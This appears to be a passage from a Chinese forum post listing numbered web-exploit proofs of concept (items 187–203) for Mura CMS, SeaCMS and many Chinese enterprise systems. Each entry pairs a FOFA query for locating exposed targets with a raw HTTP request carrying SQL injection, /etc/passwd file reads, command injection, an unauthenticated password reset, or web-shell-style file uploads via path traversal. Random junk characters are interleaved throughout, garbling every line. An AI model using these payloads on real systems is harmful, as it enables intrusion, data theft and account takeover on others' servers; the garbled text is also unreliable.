' q1 z3 p6 f1 D2 `2 e/ gPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
# `0 ~! S9 T& o8 m6 A6 F! oHost: your-ip3 z& B0 R% p0 m8 j0 _: k# F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
0 t# `8 K. N) M' B6 [; ^* dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
* n% f) s* p5 M) kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( P9 l. f, s) E5 X( RAccept-Encoding: gzip, deflate Q B# N+ P& c! j% a
Connection: close3 X8 t$ ]6 s+ H( _# K! i, [
Content-Type: application/x-www-form-urlencoded! S" g6 v$ o& k$ G# ?* z" d$ \/ U: m
( C; n; _, Z2 k9 t$ w6 R
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14507 U0 w4 y! s3 m3 U
+ A/ D8 x9 G$ G5 ]) Z
- t/ } C7 a. @ a# ~7 A7 M187. Mura CMS processAsyncObject SQL注入
$ P1 d- A r7 Q5 ^2 LCVE-2024-32640& c9 J: {2 a4 T
FOFA:"Mura CMS"
# G3 g- o/ c$ tPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.13 U( `7 C5 ~& f4 L' g2 ]8 A
Host: your-ip
6 D2 G3 P; ^! V8 |2 IContent-Type: application/x-www-form-urlencoded
% G( W8 \ {: q. S A
5 C7 V, j9 B; y$ ~. ?$ W. X- r! R! `6 Q1 t( ]9 g; }8 e
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
2 c% J/ {6 s& P+ `, R5 ]; [
6 m& f9 l. w, W) O' G
6 g0 X% s/ r0 @4 v% l! W& q188. 叁体-佳会视频会议 attachment 任意文件读取8 ]* h- G) n% p# `$ H; X+ s
version <= 3.9.78 m9 K+ X+ ^- W Y
FOFA:body="/system/get_rtc_user_defined_info?site_id"
; `* Z5 y7 r: n* S( s- `# BGET /attachment?file=/etc/passwd HTTP/1.15 A+ X: i5 I( N. I% ^; r
Host: your-ip; R1 R8 W' S4 ?1 D; h9 |4 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% ~ {3 c+ c( ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 _4 b: e s( [& Y9 j7 TAccept-Encoding: gzip, deflate
& B' X# ~3 Y) S4 j1 ?Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ I( Q& {8 [5 i, Y
Connection: close& ^/ R7 F# W' O" [, ^
" }0 s% O8 u: O. R/ G) p! h9 C
. E' g5 E3 v) t0 }189. 蓝网科技临床浏览系统 deleteStudy SQL注入4 X9 }- {/ Y" Y' q) F
FOFA:app="LANWON-临床浏览系统"
/ }3 A) j7 I7 Z" G5 _0 e9 \GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
$ d2 o& b7 @. UHost: your-ip$ L) `0 k! J* Q& x3 g& G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ t; @2 M- K8 c6 b: R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! c+ Y8 O r4 M% @ R
Accept-Encoding: gzip, deflate% A& m' z; [% D; G0 ]
Accept-Language: zh-CN,zh;q=0.9+ B" Q' F3 W* y! q& b4 K g5 m1 g
Connection: close' F; y5 I, r& m* C. k6 I, I
( m' F' o; u& P9 \
3 P" W {+ i6 Y; `190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 d2 D2 g6 y7 O0 i
FOFA:title=="短视频矩阵营销系统"
2 e' P, D6 h( n4 ^1 V; ePOST /index.php/admin/Userinfo/poihuoqu HTTP/2
7 \1 V5 f$ N& K4 q# hHost: your-ip
# J1 k T( T; R" u* c4 a; bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.363 f2 i2 t9 g L. z6 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.98 I7 r1 Y1 g" X4 I2 w
Content-Type: application/x-www-form-urlencoded& ^9 q( V, c3 X) t: l) S# p+ x: K
Accept-Encoding: gzip, deflate) ~' k. ?, A% O- u5 N* x
Accept-Language: zh-CN,zh;q=0.9
& o( g6 M) }& G5 L; S, ]/ o5 \5 I; O
poi=file:///etc/passwd% V2 w6 e2 r7 f1 z$ W: h
6 j: r. \3 p" W2 f. h' |; S( u
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入$ ^9 h2 \, Y* a' Z
FOFA:body="/CDGServer3/index.jsp"( I% E2 {' \: @
POST /CDGServer3/js/../NavigationAjax HTTP/1.19 n! D8 x) W" m0 {
Host: your-ip, E0 B- V" \0 Q6 ` n9 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ X5 I2 _1 x3 P
Content-Type: application/x-www-form-urlencoded- a: V3 l. B b9 A8 x
0 ^% G; n6 X+ g9 m/ @. B# Rcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
7 V% o# S" t. m9 Y% w- `" ?) P6 ^6 o9 P V/ X! P, _2 c: f
9 T5 o6 {4 \) a& n, N7 B$ ?192. 富通天下外贸ERP UploadEmailAttr 任意文件上传' W4 v8 ]7 a. n U- `
FOFA:title="用户登录_富通天下外贸ERP"
q, Q* Q9 J7 g d: M, F; k3 o) GPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1$ E* F a* g& A! G( J: H
Host: your-ip, D- E! |) f) [. f: l. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 c+ ]9 G! e7 `- W. CContent-Type: application/x-www-form-urlencoded
( @$ p8 D9 ]: \( i# w# y
; I% U! e4 F- W7 E
2 h; T! [) G1 P( x<% @ webhandler language="C#" class="AverageHandler" %>6 t. W5 i9 G6 R$ a
using System;
8 _/ |* ?! k( u2 K H7 Iusing System.Web;
# k; t4 V t9 Ipublic class AverageHandler : IHttpHandler
# O" j% V6 a* c4 l3 @$ t{
, T, x. L! e* ^! K3 Jpublic bool IsReusable
4 v/ o* a& P" I1 `{ get { return true; } }
' O; k3 m, W# M& p( O% z3 npublic void ProcessRequest(HttpContext ctx)5 V7 X' f8 |$ a: ]
{
U2 D5 C( [; E: mctx.Response.Write("test");
4 p% Q) L' R& `}9 m& y& M- V4 f7 _; A$ e6 ~
}3 M# x; {5 ~! y3 }- a- |7 }7 }
5 L2 s& H4 o* a4 j$ H: G [) ~! @
9 o' K6 F3 h0 C. ~4 F193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 l% ]% T5 _# J6 h+ C
FOFA:body="山石云鉴主机安全管理系统"* C, b6 S! k+ Y
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
8 h7 o! L7 U5 {9 ^& b, o' _Host:6 r% _, |7 w* X( `* ^
Cookie: PHPSESSID=2333333333333;3 [, X, F4 b6 D" X8 h
Content-Type: application/x-www-form-urlencoded
/ F! r1 M# w/ ~) K1 \. _User-Agent: Mozilla/5.0
, w5 K/ ~" o' l) f+ S9 k# Z
b' R, {( q; o% {$ x# V ^6 S) O$ p" m
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.18 \, P: g! Y* N" i8 s5 z
Host:
7 J, q. Q l p% ? i7 z2 pUser-Agent: Mozilla/5.04 i$ C; `( h) i
Accept-Encoding: gzip, deflate% h, I. |0 L1 j
Accept: */*) ]2 H0 {0 r' s: j7 x
Connection: close
" Q9 f: N# E* M8 X( m# X3 E% @Cookie: PHPSESSID=2333333333333;
$ W7 B4 l+ E4 iContent-Type: application/x-www-form-urlencoded1 e, I: G3 N4 G
Content-Length: 84
/ P( \0 j6 I% k. C
; e: L# F1 A4 Qparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')5 i/ G7 P" ~6 U0 ]
5 y9 v) J0 d* A3 A+ ]! O/ y. k; T j+ \+ n" W
GET /master/img/config HTTP/1.1
2 W4 Q( X# z, I% b6 b6 ZHost:
& h3 D) s+ P ^0 {2 I2 }User-Agent: Mozilla/5.06 A) A/ f$ P' }+ W5 ~
& ~) p( t; ]3 H5 h5 J2 \" W
# k7 k9 S; d/ t2 X
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) S7 R! n3 ]! n D, K% ZFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在' I8 X5 t0 { i3 |# ~3 r! R
6 h' t: [1 A" \7 F. GPOST /servlet/uploadAttachmentServlet HTTP/1.1% H' O/ m, n2 i# _* w) V F
Host: host
8 d& X5 C1 {. y6 Y' B0 E. c' U: K9 _4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
& Z) Q3 j( G7 L) q: ^' ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ K) ^0 y9 Q& _5 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ |- c8 T. B, l( o
Accept-Encoding: gzip, deflate
% h9 t' G$ c1 |Connection: close
# u* C ^$ f$ r5 B3 NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ c2 K3 v9 l5 }8 w/ H------WebKitFormBoundaryKNt0t4vBe8cX9rZk3 ]$ X3 i- E7 P* L6 t% \8 r
& }5 @: S+ \0 m' B9 pContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp". _ p- ]% o: `8 Q9 D# `2 c, J
Content-Type: text/plain
1 m! _, D! i$ c/ O3 ^* ~. u# K<% out.println("hello");%>
. \4 j3 M; R( I; A------WebKitFormBoundaryKNt0t4vBe8cX9rZk3 q7 {: g1 \& P9 Q+ K# X: c( j
Content-Disposition: form-data; name="json"+ v: a5 G! ^5 L
{"iq":{"query":{"UpdateType":"mail"}}}
) u: L: O5 X `( C5 ?------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
5 g# U1 S+ S9 ]3 p
5 Q/ C) ?2 o: R+ z2 |" s) g1 K4 k# ?6 O; K
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
# d: z- i% @3 p3 ]+ T! RFOFA:title=="飞鱼星企业级智能上网行为管理系统 c, ^; r* p% j5 g# c
POST /send_order.cgi?parameter=operation HTTP/1.1
0 k H1 q+ L8 O: L0 w: L, P; WHost: 127.0.0.1* d5 A8 c+ F/ t T \% v1 p
Pragma: no-cache" D1 q! B* f2 f7 W! b; S( _
Cache-Control: no-cache. `' @& s( i8 V) p! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& O+ u4 C+ }' B& `Accept: */*
# ?+ x8 w# J6 e) BAccept-Encoding: gzip, deflate
9 u, U* V" f4 ]% q' W; yAccept-Language: zh-CN,zh;q=0.93 Y" l' x6 D- J( z; v
Connection: close9 I/ g# j* g) Y: [- @
Content-Type: application/x-www-form-urlencoded
2 R2 s a6 k& |- uContent-Length: 682 y/ U9 b a2 p4 N% n$ |3 o/ k
! q4 {3 |" [9 J& E% K{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
- s4 m" v; j2 F+ q5 k* ]" t- l' B
% K' O3 L& o8 {" f7 C) n2 Q0 k+ H" |* Z% ]6 s* d/ T) z+ E
196. 河南省风速科技统一认证平台密码重置
) ~7 N) a. p7 l) {& e5 N& R; {6 sFOFA:body="/cas/themes/zbvc/js/jquery.min.js"0 `- F& l, ?/ v
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1' i6 j$ s, Z& Q% A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ `) h9 x# A: y7 v
Content-Type: application/json;charset=UTF-8
9 {6 f. N5 ?2 v9 ^- W* f2 LX-Requested-With: XMLHttpRequest
& c, l9 M) E; s- l x. O8 R- HHost:
# y" b) u* S; Y9 BAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- W8 s' q5 M* }8 F YContent-Length: 45* ~* W* U1 F) {: `+ P2 y3 V2 C& |
Connection: close
" y2 S* \% T. L( I) ]2 y" N2 ]& I" }
{"xgh":"test","newPass":"test666","email":""}
% }+ a% v B! ?* E" u; V
: W9 K0 y# {' a: [
* U8 c1 X8 |8 a- H* x i! e. b9 B4 P- h" D4 w: G. w
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
8 D' j: B& X" W& Z$ nFOFA:app="浙大恩特客户资源管理系统"$ P1 x8 c+ h0 l) o
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
7 E1 @: n9 \5 }) h6 dHost:% o: ]) i1 h, q. ^3 B! r% ?5 ]9 F6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
) F3 c* i0 `9 i) j; f8 LAccept-Encoding: gzip, deflate6 o$ t& l9 Y8 M1 b) p
Connection: close
+ v. x0 A% b& ] ]2 m9 _, A0 \' y! g' q: s$ s. }( c
& n. ~& A7 S5 C
4 D! ~7 H, ]# e" L. A% d198. 阿里云盘 WebDAV 命令注入3 S# T9 Z( I1 |: F
CVE-2024-29640
) u( C# _" b0 ~/ P, E! K: f. x- pGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
+ M& s. p4 w2 \0 F* `2 }- r' UCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
N8 r, x1 `- {Accept: */*
2 z$ w3 O! c/ O- k6 {" bAccept-Encoding: gzip, deflate4 z! _; g7 P. |' m$ U9 O
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
4 Q {4 \* {# `2 C, M: WConnection: close
+ s, s# M4 m$ i
9 |8 z3 D* [4 \' d4 A. \! d, W, x1 I1 F2 c, [5 r: d
199. cockpit系统assetsmanager_upload接口 文件上传
* A( m/ M0 }5 q" @+ X8 f
; a# }5 l7 r/ L" ~! F8 E/ I l: _1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
3 h" B- k/ {+ P7 R* k; ?GET /auth/login?to=/ HTTP/1.1
% \' a, l% A# V: L0 ^7 h
3 @2 P+ _& j( t9 ^9 R- C响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"1 ?4 w: O3 X6 @+ k# J' B
) ], `5 u% z3 i
2.使用刚才上一步获取到的jwt获取cookie:8 Y2 h' Q, e$ }, T/ H4 c# Z
/ M# Z3 Q* i4 I3 S* h/ c% v! oPOST /auth/check HTTP/1.1
/ }7 v+ N( w+ d( d9 L& A. DContent-Type: application/json+ c# \1 U) h8 c! ]0 V/ i1 L
% Z4 U) I0 c% g! l" s8 O{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}& V6 F# w1 c& q, B% c1 |; U0 z
0 N: [& U! a8 s6 h! u1 |5 u响应:200,返回值:
9 O# g. b. S) v ~2 |3 xSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/+ [2 i: L4 ?- F M# H, S
Fofa:title="Authenticate Please!"/ A P4 c X) L* s4 D/ p
POST /assetsmanager/upload HTTP/1.1$ J5 c1 S6 G- a6 w- B6 s
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
1 K, O- {* {' E. D, u: c7 uCookie: mysession=95524f01e238bf51bb60d77ede3bea92
/ y7 X1 ?6 J3 R& R7 B- W
s Z: w( \* S# r4 d* z, i-----------------------------36D28FBc36bd6feE7Fb3
" J( u' t+ S7 m8 dContent-Disposition: form-data; name="files[]"; filename="tttt.php"! O# x& d5 `% a+ |& \& G* J
Content-Type: text/php
+ Q3 N$ M$ ^' Z( E; u6 z6 [& U N
6 x: S0 {! ~! \# @<?php echo "tttt";unlink(__FILE__);?>. F+ X a# n$ r f
-----------------------------36D28FBc36bd6feE7Fb3
d* p7 ?/ ?) J' r& {7 t. a5 e+ mContent-Disposition: form-data; name="folder"
- v( @; ?, l; o3 \/ L; {' F! K# Q' G
-----------------------------36D28FBc36bd6feE7Fb3--! `5 R- S0 v$ r- d
, @9 M3 {) K" H7 h! \" P+ }5 Z9 h, [. R h- }
/storage/uploads/tttt.php
2 [1 C' B* o' r: F# w- y2 _2 v& y, |& t& o) F" a/ R7 F
200. SeaCMS海洋影视管理系统dmku SQL注入7 H) N* S# M4 _8 i5 D
FOFA:app="海洋CMS"
4 i/ Z3 t: G9 E) @8 ~0 T3 IGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 @% S* ?) z+ j8 O* ?
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
! z# x+ t2 k& C m, AUpgrade-Insecure-Requests: 1* x: _4 y) E6 E# ~
Cache-Control: max-age=0$ W' q: _% U; t* {/ Z- A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# M" z7 h: h5 q u: wAccept-Encoding: gzip, deflate8 U0 @; V. m$ K. x1 {; L; x
Accept-Language: zh-CN,zh;q=0.9) _3 ^$ _3 N& G
' g# I: k& M N: g" ~% B/ r8 `, {* y* Q
201. 方正全媒体新闻采编系统 binary SQL注入
6 { _+ U" }2 \; rFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"$ E2 E2 J- t) q' f, b' P
POST /newsedit/newsplan/task/binary.do HTTP/1.1
' @3 c5 C A9 w! [; @. RContent-Type: application/x-www-form-urlencoded$ C+ x. ^6 T( e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# ?& {# M5 \3 |/ D; ^7 Q5 G1 BAccept-Encoding: gzip, deflate
5 S$ Z& o% M% g/ k' {: e* t6 LAccept-Language: zh-CN,zh;q=0.9
) S( P) a) a, J9 ~) A8 DConnection: close
9 ~7 c, r R$ c0 e7 ]$ z$ D9 q' _) i! g0 C+ X5 A$ T% d! F+ d
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1& f, z/ c( x) N0 Q5 V
. ?1 E5 s" n( d5 e
8 r: I5 o, z, O* j202. 微擎系统 AccountEdit任意文件上传
8 l3 h( @' k4 g, `9 gFOFA:body="/Widgets/WidgetCollection/"+ g- \+ x; t! a" M
获取__VIEWSTATE和__EVENTVALIDATION值
$ }% F* \ N% W* vGET /User/AccountEdit.aspx HTTP/1.1$ `- _! S" o+ I. h+ |
Host: 滑板人之家, I. k# D D& [/ g+ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
9 l/ [4 D8 G3 k3 {% qContent-Length: 0
$ K* a0 G& J8 `* v2 F/ c) l; T7 X
* |) u4 b9 Q/ _1 z" Y' y) n9 m! {6 ]9 O- `' g! |7 A4 N
替换__VIEWSTATE和__EVENTVALIDATION值) J' G6 z6 a. y* [, v" \3 x* F
POST /User/AccountEdit.aspx HTTP/1.1
s' ?( V5 n3 f1 ]0 R. {4 C2 KAccept-Encoding: gzip, deflate, br
`, V, Z5 T$ |0 ^' BContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356875 z; k9 I4 \0 }6 q8 O! m/ ]
. [( ?1 {4 ^- g2 ^-----------------------------786435874t385875938657365873465673587356879 H- Z- O1 ^( G
Content-Disposition: form-data; name="__VIEWSTATE". T: V) G. W+ d( a+ l8 v k
0 Y# `4 L; o, |. o$ c! L__VIEWSTATE
: A! X' p# c$ B2 {; r/ Y-----------------------------786435874t38587593865736587346567358735687
3 g8 t4 E( `, `; _9 E9 p: F* J4 hContent-Disposition: form-data; name="__EVENTVALIDATION"
; X+ f; R# W& n) @# M. w; H( ?; n; t, n5 {$ P8 R; C f$ R! l
__EVENTVALIDATION
. P; @; G* T4 M# p-----------------------------786435874t38587593865736587346567358735687, v# L1 _8 J/ Z. T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
$ R! Q3 F D+ S5 ?6 s" e) }Content-Type: text/plain
% h+ t5 j" V% |& K9 ~5 }+ F8 i
Hello World!
, b; Y3 }6 s: m5 g0 ^" q3 P& w-----------------------------786435874t38587593865736587346567358735687/ l3 l5 Y: {0 `/ [( K0 m
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
6 W7 L7 i& X6 F6 ]# U/ F$ @0 W% y3 |# e0 H/ \" u
上传图片
2 i# S7 @' [( F! r$ {-----------------------------786435874t38587593865736587346567358735687
" L3 a8 k( Y3 _( LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"% |- F4 h7 Y9 t3 r' a
: q6 k8 {. v3 q" v
' k- e1 m) u8 ]( S' z w/ r-----------------------------786435874t38587593865736587346567358735687
4 G' g$ \% T( \$ u6 k/ f4 @% gContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
- G( \# v2 S, c+ r) R5 n) a1 j, @9 o( g& z$ C
$ @/ r0 y) n; O I- z-----------------------------786435874t38587593865736587346567358735687--7 M4 @! G! q9 K% y/ p
2 h+ n! D" S1 s/ H$ u# A
) a5 Q' B, n* l- O8 P
/_data/Uploads/1123.txt
; ~, p( y# T, D! ?
* {9 H; v/ |2 ]: \1 J+ |203. 红海云EHR PtFjk 文件上传
& n% i/ `5 @# h# zFOFA:body="RedseaPlatform"
- y/ E" E3 ]5 P' O/ }4 S& TPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( X" M& X# |) u! H; Q5 uHost: x.x.x.x. X# r) I5 h. c+ d# {
Accept-Encoding: gzip
3 I* Z. a7 ^1 r" d# |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 R$ T' K U7 h5 a8 i2 C" g7 A, E |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
* j) y$ j% c' A2 ]/ JContent-Length: 210
3 [( U e D9 R5 {
/ }; @/ F' w% {# r9 O------WebKitFormBoundaryt7WbDl1tXogoZys4
, G3 W2 ~ e! _. ]9 bContent-Disposition: form-data; name="fj_file"; filename="11.jsp"1 P% ~# p5 S0 p6 Y; D Z, n. B
Content-Type:image/jpeg
7 S% x1 a4 {4 [8 ~' a# D8 w$ D z+ U$ P, W1 O3 w8 r
<% out.print("hello,eHR");%>0 A9 P* Z4 L& u9 [0 g$ ^
------WebKitFormBoundaryt7WbDl1tXogoZys4--
* ^ {- \! V7 v
: {% I8 L/ J: `9 S0 T2 ~/ L0 B. i
* Y) Q$ A- I3 O( S6 P: `- M0 K- F: I3 ^4 y2 a
- r! N* \. S5 \/ Q( V$ D4 @: B6 j
% D" g9 B0 y! d+ E7 `! I% g" w* \( A0 ~5 V* Z8 e* s; v. _- C( B2 j
|
发表于 2024-6-5 14:31:29
收藏
支持
反对